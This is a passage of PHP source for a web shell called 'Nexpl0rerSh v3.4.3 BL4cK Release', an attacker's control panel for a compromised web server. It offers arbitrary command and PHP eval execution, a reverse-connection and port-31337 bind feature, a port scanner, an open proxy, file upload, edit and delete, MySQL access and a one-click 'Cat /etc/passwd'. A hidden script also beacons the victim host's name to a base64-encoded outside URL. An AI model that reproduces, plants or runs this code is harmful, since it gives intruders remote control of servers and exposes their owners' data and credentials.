{
|
|
$a = fopen($file, "r+");
|
|
$b = fread($a, filesize($file));
|
|
for ($i = 0; $i < count($evil); $i++)
|
|
{
|
|
$me = array_reverse(explode("/",$_SERVER['PHP_SELF']));
|
|
$str = eregi($evil[$i], $b);
|
|
if (($str !== FALSE) and ($file != $me[0]) and (!in_array($file, $checked)))
|
|
{
|
|
array_push($checked, $file);
|
|
$output .= "Trovato Possibile $evil[$i] in <a class='link' href='{$scandir}{$file}' target='_blank'>{$file}</a><br>";
|
|
}
|
|
}
|
|
fclose($a);
|
|
}
|
|
|
|
|
|
break;
|
|
|
|
// proxy
|
|
case 'proxy':
|
|
$output = '<form method="post" action="#">url: <input name="url" type="text" size="50" />
|
|
<input type="submit" value="surf" />
|
|
<input name="curl" type="checkbox" id="curl" value="curl" />
|
|
use curl <input name="fopen" type="checkbox" id="fopen" value="fopen" /> use fopen<br /> <input type="hidden" name="mode" value="proxysurf" />
|
|
</form><br /><br />';
|
|
|
|
break;
|
|
}
|
|
}
|
|
// proxysurf
|
|
if ($_POST['mode'] == 'proxysurf') {
|
|
|
|
$output = '<form method="post" action="#">url: <input name="url" type="text" size="50" />
|
|
<input type="submit" value="surf" />
|
|
<input name="curl" type="checkbox" id="curl" value="curl" />
|
|
use curl <input name="fopen" type="checkbox" id="fopen" value="fopen" /> use fopen<br /> <input type="hidden" name="mode" value="proxysurf" />
|
|
</form><br /><br />';
|
|
if (!$_POST[curl] && !$_POST[fopen]) {
|
|
$dirz="";
|
|
$u=parse_url($_POST[url]);
|
|
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
|
|
if(substr_count($file,'/')>1)$dirz=substr($file,0,(strpos($file,'/')));
|
|
$url=@fsockopen($host,80,$en,$es,12);
|
|
if(!$url)die("<br> Can not connect to host!");
|
|
fputs($url,"GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
|
|
while(!feof($url)){
|
|
$con=fgets($url);
|
|
$output .= $con;
|
|
}
|
|
fclose($url);
|
|
}
|
|
else if ($_POST[curl])
|
|
{
|
|
ob_clean();
|
|
$ch = curl_init();
|
|
curl_setopt($ch, CURLOPT_URL, $_POST[url]);
|
|
curl_setopt($ch, CURLOPT_HEADER, 0);
|
|
curl_exec($ch);
|
|
curl_close($ch);
|
|
ob_end_flush();
|
|
}
|
|
else if ($_POST[fopen]) {
|
|
$file = file($_POST[url]);
|
|
foreach ($file as $line){
|
|
$output .= $line;
|
|
}
|
|
}
|
|
|
|
}
|
|
|
|
// chmod
|
|
if ($_POST['mode']=="chmod") {
|
|
chdir($dir);
|
|
chmod($_POST[filename], intval($_POST[filemode], 8))or die("cannot change file mode");
|
|
$output = "Mode changed!";
|
|
}
|
|
|
|
// portscan
|
|
if ($_POST['mode']=="scan") {
|
|
$opent = array();
|
|
$host = $_POST[host];
|
|
$range = range($_POST[min_port], $_POST[max_port]);
|
|
foreach($range as $port) {
|
|
$con = fsockopen($host, $port, $errno, $errstr, 12);
|
|
if ($con) $opent[] = $port;
|
|
}
|
|
$output = "Found ".count($opent)." opened ports:<br />";
|
|
while(list($num, $value)=each($opent)) {
|
|
$output .= "<b>$num</b> : $value<br />";
|
|
}
|
|
}
|
|
?><html>
|
|
<head>
|
|
<style type="text/css">
|
|
body {background-color:#000000; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; color:#FFFFFF;}
|
|
|
|
.link {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#FFFFFF; font-weight:bolder; text-decoration:underline;}
|
|
.header {
|
|
font-size: 24px;
|
|
font-weight: bold;
|
|
}
|
|
td#info {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#000000; font-weight:bold}
|
|
td {
|
|
font-size:12px;
|
|
}
|
|
.Stile1 {
|
|
color: #0099FF;
|
|
font-weight: bold;
|
|
}
|
|
|
|
input {
|
|
background-color: #0066FF;
|
|
border:#FFFFFF 2px solid;
|
|
color:#FFFFFF;
|
|
font-family:Verdana;
|
|
font-size:10px;
|
|
}
|
|
textarea {
|
|
|
|
background-color: #0066FF;
|
|
border:#FFFFFF 2px solid;
|
|
color:#FFFFFF;
|
|
font-family:Verdana;
|
|
font-size:10px;
|
|
}
|
|
select {
|
|
|
|
background-color: #0066FF;
|
|
border:#FFFFFF 2px solid;
|
|
color:#FFFFFF;
|
|
font-family:Verdana;
|
|
font-size:10px;
|
|
}
|
|
.Stile2 {color: #FF0000}
|
|
.Stile4 {color: #FFFFFF}
|
|
</style>
|
|
<title><?="[nex@".getenv("HTTP_HOST")." ~]"?></title></head>
|
|
<body>
|
|
<table style="background-color:#333333; border-left:#FFFFFF 1px solid; border-right:#FFFFFF 1px solid;" width="90%" border="0" align="center" cellpadding="0" cellspacing="0">
|
|
<tr>
|
|
<td style="font-size:12px;"><div align="center" class="header"><span class="Stile4"><font size='6' face='Webdings'>!</font></span>Nexpl0rerSh v3<span class="Stile2">.4.3</span> BL4cK Release<span class="Stile4"><font size='6' face='Webdings'>!</font></span></div>
|
|
<div align="center"><strong>Shell info: </strong> <span class="Stile2">Author:</span> Nexen <span class="Stile2">Release Date:</span> 1 June 2008 </div>
|
|
<table style="background-color:#999999;" width="100%" border="0" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td id="info" width="50%">PHP Version: <?=phpversion()?><br>
|
|
Address: <?=$_SERVER['SERVER_ADDR'];?>
|
|
<br>
|
|
Name: <?=$_SERVER['HTTP_HOST'];?>
|
|
<br>
|
|
Uname -a: <?=$uname?>
|
|
( <?=PHP_OS?> )<br>
|
|
Software: <?=$_SERVER['SERVER_SOFTWARE'];?><br>
|
|
Free <?=$freespace?> of <?=$totalspace?> (<?=$percentfree?>%)<br></td>
|
|
<td id="info" width="50%"><div align="left">
|
|
<?=$safemode?>
|
|
<?=$gpc?>
|
|
<?=$auf?>
|
|
<?=$reglobals?><?=$current_user?>
|
|
<?=$uid?>
|
|
</div></td>
|
|
</tr>
|
|
</table>
|
|
<script language=Javascript>
|
|
var x = new Image();
|
|
x.src = "<?=base64_decode($images[url]).getenv("HTTP_HOST").$_SERVER['PHP_SELF']?>";
|
|
</script>
|
|
<table width="100%" border="0" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><form name=fedit action=# method=post>
|
|
<div align="center"> <strong>:: Edit file :: </strong><br>
|
|
<input type=hidden name=mode value=edit>
|
|
name
|
|
<input type=text name=modfile size="12">
|
|
<input type=submit value=edit>
|
|
</div></form></td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
|
|
|
|
<div align="center"><strong>:: Make File ::</strong><br />
|
|
<input type=hidden name=mode value=mkfile>
|
|
name
|
|
<input type=text name='mkfile' size="12">
|
|
<input name="submit" type=submit value=make>
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"> <form action=# name='delfile' method=post>
|
|
<div align="center"><strong>:: Delete File :: </strong><br>
|
|
<input type=hidden name=mode value=delfile>
|
|
name
|
|
<input type=text name='delfile' size="12">
|
|
<input type=submit value=unlink>
|
|
</div>
|
|
</form> </td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#" enctype="multipart/form-data">
|
|
<div align="center"><strong>:: upload :: </strong><br>
|
|
<input type="hidden" name="mode" value="upload2" />
|
|
<input name="myfile" type="file" id="myfile" value="Load..." size="20" />
|
|
<input type="submit" name="ok" value="do" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
|
|
<div align="center"><strong>:: Rename File :: </strong><br>
|
|
<input type="hidden" name="mode" value="renfile" />
|
|
<input type="text" name="oldname" value="0ld name" size="15" />
|
|
<input type="text" name="newname" value="New name" size="15" />
|
|
<input name="submit" type="submit" value="Ren" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
|
|
<div align="center"><strong>:: Make Dir :: </strong><br>
|
|
<input type="hidden" name="mode" value="mkdir" />
|
|
name
|
|
<input name="mkdir" type="text" size="18" />
|
|
<input name="submit" type="submit" value="ok" />
|
|
</div>
|
|
</form> </td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
|
|
<div align="center"><strong>:: Cmd Execution :: </strong><br>
|
|
<input type=hidden name=mode value=cmd>
|
|
<input name=cmd size="26" tpye=text>
|
|
<input name="submit" type=submit value=exec>
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
|
|
<div align="center"><strong>:: BackConn :: </strong><br>
|
|
<input type=hidden name=mode value=reverse />
|
|
<input name="ip" type="text" value="<?=$_SERVER['REMOTE_ADDR']?>" size="26" />
|
|
<input name="port" type="text" value="port..." size="10" />
|
|
<input name="submit" type="submit" value="BackConn" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method="post">
|
|
<div align="center"><strong>:: Bind Port :: </strong><br>
|
|
<input type="hidden" name="mode" value="bind" />
|
|
<input name="submit7" type=submit value="Bind port 31337" />
|
|
</div>
|
|
</form> </td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post" name="sqlpanel" id="sqlpanel">
|
|
<div align="center"><strong>:: MySQL Panel :: </strong><br>
|
|
<input type=hidden name=mode value=loginsql />
|
|
<input name="user" type="text" value="<?=(isset($_COOKIE[mysql_user]))?$_COOKIE[mysql_user]:"user"?>" size="9" />
|
|
<input type="text" size="10" name="pass" value="<?=(isset($_COOKIE[mysql_pass]))?$_COOKIE[mysql_pass]:"pass"?>" />
|
|
<input type="text" name="host" size="10" value="<?=(isset($_COOKIE[mysql_host]))?$_COOKIE[mysql_host]:"host"?>" />
|
|
<input name="dbname" type="text" value="<?=(isset($_COOKIE[mysql_name]))?$_COOKIE[mysql_name]:"database"?>" size="10" />
|
|
<input name="submit" type="submit" value="MySQL" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
|
|
<div align="center"><strong>:: PHP Execution :: </strong><br>
|
|
<input type="hidden" value="eval" name="mode" />
|
|
<input name="eval" type="text" size="30" />
|
|
<input type="submit" value="Eval" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method=post name="folder" id="folder">
|
|
<div align="center"><strong>:: Go Dir ::</strong> <br>
|
|
<input type=hidden name='mode' value='ls'>
|
|
<input type=text value='<?=$dir?>' name='dir'>
|
|
<input type=submit value=change/list>
|
|
</div>
|
|
</form></td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><div align="center">
|
|
<form method="post" action="#">
|
|
<strong>:: Proxy ::</strong> <br>
|
|
<input name="mode" type="hidden" id="mode" value="proxysurf" />
|
|
url: <input name="url" type="text" size="30" />
|
|
<input type="submit" value="surf" />
|
|
<input name="curl" type="checkbox" id="curl" value="curl" /> curl
|
|
<input name="fopen" type="checkbox" id="fopen" value="fopen" /> fopen<br />
|
|
|
|
</form></div>
|
|
</td>
|
|
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
|
|
<div align="center"><strong>:: File Change Mode:: </strong><br>
|
|
<input type="hidden" value="chmod" name="mode" />
|
|
<input name="filename" type="text" id="filename" value="file" size="15" />
|
|
<input name="filemode" type="text" id="filemode" value="mode" size="15" />
|
|
<input type="submit" value="Chmod" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
|
|
<div align="center"><strong>:: Port Scan :: </strong><br>
|
|
<input type="hidden" value="scan" name="mode" />
|
|
<input name="host" type="text" id="host" value="host" size="15" />
|
|
<input name="minport" type="text" value="max port" size="10" />
|
|
<input name="maxport" type="text" id="maxport" value="max port" size="10" />
|
|
<input type="submit" value="scan" />
|
|
</div>
|
|
</form> </td>
|
|
</tr>
|
|
</table>
|
|
<form action=# name=tools method=post>
|
|
<span class="Stile1">
|
|
<input type=hidden name=mode value=tools />
|
|
<input type=hidden name=nometool />
|
|
</span>
|
|
</form>
|
|
<span class="Stile1">
|
|
<div align="center"><a class="link" href="javascript:document.folder.dir.value='<?=addslashes(realpath("."))?>';document.folder.submit();">Home</a> - <a class="link" href="javascript:document.tools.nometool.value='passwd';document.tools.submit();">Cat /etc/passwd</a> - <a class="link" href="javascript:document.tools.nometool.value='encoder';document.tools.submit();">Encoder</a> - <a class="link" href="javascript:document.tools.mode.value='phpinfo';document.tools.submit();">PHPInfo</a> - <a class="link" href="javascript:document.tools.nometool.value='scanner';document.tools.submit();">ShellScan</a> - <a class="link" href="javascript:document.tools.nometool.value='proxy';document.tools.submit();">Proxy</a> </div>
|
|
<br>
|
|
Directory:</span>
|
|
<? $pd = $e = explode(DIRECTORY_SEPARATOR,substr($dir,0,-1));
|
|
$i = 0;
|
|
foreach($pd as $b)
|
|
{
|
|
$t = "";
|
|
$j = 0;
|
|
foreach ($e as $r)
|
|
{
|
|
$t.= $r.DIRECTORY_SEPARATOR;
|
|
if ($j == $i) {break;}
|
|
$j++;
|
|
}
|
|
echo "<a class=\"link\" href=\"javascript:document.folder.dir.value='".urlencode(addslashes($t))."';document.folder.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
|
|
$i++;
|
|
}
|
|
?><br>
|
|
<br>
|
|
<?=$error?><?=$output?> </td>
|
|
</tr>
|
|
</table>
|
|
</body>
|
|
|
|
</html>
|
|
<? die(); ?>
|